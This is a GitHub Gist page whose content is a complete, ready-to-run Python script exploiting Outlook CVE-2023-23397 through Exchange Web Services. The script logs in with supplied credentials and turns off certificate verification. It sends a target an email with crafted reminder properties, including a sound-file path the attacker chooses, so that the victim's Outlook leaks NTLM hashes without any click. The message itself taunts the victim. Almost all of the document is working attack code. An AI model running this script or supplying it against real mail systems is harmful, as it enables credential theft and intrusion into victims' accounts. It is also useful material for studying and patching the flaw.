Created
March 28, 2023 09:30
-
-
Save tothi/d2d6c6a3e8b1d72ce6646d8683326e49 to your computer and use it in GitHub Desktop.
Exploiting Outlook CVE-2023-23397 using Python by sending the message through EWS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python -u | |
from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty | |
from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW | |
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter | |
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter | |
import urllib3 | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
import argparse | |
parser = argparse.ArgumentParser(description='Outlook CVE-2023-23397: 0-click PrivEsc') | |
parser.add_argument('-u', '--username', required=True) | |
parser.add_argument('-p', '--password', required=True) | |
parser.add_argument('-s', '--server', required=True) | |
parser.add_argument('-t', '--target', required=True) | |
parser.add_argument('-f', '--filepath', required=True) | |
args = parser.parse_args() | |
def log(msg): | |
print(msg, end="") | |
log("[*] Logging in to EWS...") | |
credentials = Credentials(args.username, args.password) | |
config = Configuration(server=args.server, credentials=credentials) | |
account = Account(primary_smtp_address=args.username, config=config, autodiscover=False, access_type=DELEGATE) | |
log(args.username+"\n") | |
class PidLidReminderTime(ExtendedProperty): | |
property_set_id = '00062008-0000-0000-C000-000000000046' | |
property_id = 0x8502 | |
property_type = 'SystemTime' | |
class PidLidReminderSet(ExtendedProperty): | |
property_set_id = '00062008-0000-0000-C000-000000000046' | |
property_id = 0x8503 | |
property_type = 'Boolean' | |
class PidLidReminderFileParameter(ExtendedProperty): | |
property_set_id = '00062008-0000-0000-C000-000000000046' | |
property_id = 0x851f | |
property_type = 'String' | |
class PidLidReminderOverride(ExtendedProperty): | |
property_set_id = '00062008-0000-0000-C000-000000000046' | |
property_id = 0x851c | |
property_type = 'Boolean' | |
class PidLidReminderPlaySound(ExtendedProperty): | |
property_set_id = '00062008-0000-0000-C000-000000000046' | |
property_id = 0x851e | |
property_type = 'Boolean' | |
class PidLidFlagRequest(ExtendedProperty): | |
property_set_id = '00062008-0000-0000-C000-000000000046' | |
property_id = 0x8530 | |
property_type = 'String' | |
class PidTagFlagStatus(ExtendedProperty): | |
property_tag = 0x1090 | |
property_type = 'Integer' | |
class PidTagFlagComplete(ExtendedProperty): | |
property_tag = 0x1091 | |
property_type = 'SystemTime' | |
log("[*] Building malicious email message...\n") | |
message = Message(account=account, folder=account.sent, subject="You Have Been Pwn3d!", body="Give me your hashes!", to_recipients=[args.target]) | |
message.register('PidTagFlagStatus', PidTagFlagStatus) | |
message.register('PidTagFlagComplete', PidTagFlagComplete) | |
message.register('PidLidFlagRequest', PidLidFlagRequest) | |
message.register('PidLidReminderSet', PidLidReminderSet) | |
message.register('PidLidReminderTime', PidLidReminderTime) | |
message.register('PidLidReminderFileParameters', PidLidReminderFileParameter) | |
message.register('PidLidReminderOverride', PidLidReminderOverride) | |
message.register('PidLidReminderPlaySound', PidLidReminderPlaySound) | |
log("[*] Registered Extended Properites...\n") | |
log("[*] Setting values...") | |
message.PidTagFlagStatus = 2 | |
message.PidLidFlagRequest = 'Pwn!' | |
message.PidLidReminderSet = True | |
message.PidLidReminderTime = UTC_NOW() | |
message.PidTagFlagComplete = UTC_NOW() | |
message.PidLidReminderFileParameters = args.filepath | |
message.PidLidReminderOverride = True | |
message.PidLidReminderPlaySound = True | |
log("DONE.\n") | |
#print(message) | |
log("[+] Sending message...") | |
message.send_and_save() | |
log("SENT!\n") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment